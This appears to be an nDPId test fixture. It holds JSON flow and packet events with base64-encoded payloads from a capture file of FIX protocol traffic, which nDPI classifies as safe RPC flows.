-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"} -00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"} -00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"} -00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"} -00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"} -00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="} -00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 